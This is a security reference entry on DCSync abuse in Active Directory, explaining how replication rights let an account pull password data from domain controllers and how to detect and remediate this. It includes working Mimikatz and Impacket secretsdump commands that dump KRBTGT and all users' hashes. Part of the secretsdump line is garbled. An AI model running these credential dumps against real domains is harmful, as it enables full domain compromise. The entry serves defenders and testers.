DCSync Permissions Abuse
Description
DCSync abuses directory replication privileges to request password data directly from domain controllers via the DRSUAPI/DRS protocol. Any principal with Replicating Directory Changes, Replicating Directory Changes All, and (in some cases) Replicating Directory Changes In Filtered Set can impersonate a DC and extract credential data for any user, including KRBTGT. These rights are sometimes granted to helpdesk or sync tools and left in place indefinitely.
Examples
Check for Replication Rights and Abuse with Mimikatz
From a host where you control a privileged account with replication rights:
mimikatz "lsadump::dcsync /domain:corp.local /user:corp\krbtgt" exit
This returns NTLM hashes and Kerberos keys for the specified user.
Abuse with Impacket
Use secretsdump.py to perform a DCSync-style dump remotely:
secretsdump.py -dc-ip 10.0.0.10 corp.local/replicator:[email protected] -just-dc
Hashes for all users confirm the ability to replicate secrets.
Identify who has replication rights
# PowerView
Get-ObjectAcl -DistinguishedName (Get-Domain).DistinguishedName -ResolveGUIDs | \
? { $_.ActiveDirectoryRights -match "Replicating Directory Changes" } | \
Select IdentityReference, ActiveDirectoryRights
# DSACLS (native)
dsacls "DC=corp,DC=local" | findstr /i "Replicating Directory Changes"
Remediation
- Restrict replication privileges
- Only domain controllers and Tier‑0 admin groups should hold replication rights.
- Remove rights from service accounts and third‑party tools; use least privilege.
- Monitor and alert
- Watch 4662 on DCs for DRS operations by non‑DC principals; alert on changes to ACEs granting replication rights.
- Deploy canary users and detect when their hashes are requested.
- Recover after exposure
- Rotate the
KRBTGTpassword (twice) following suspected compromise to invalidate minted tickets. - Perform credential hygiene and forced password resets for impacted accounts.
- Rotate the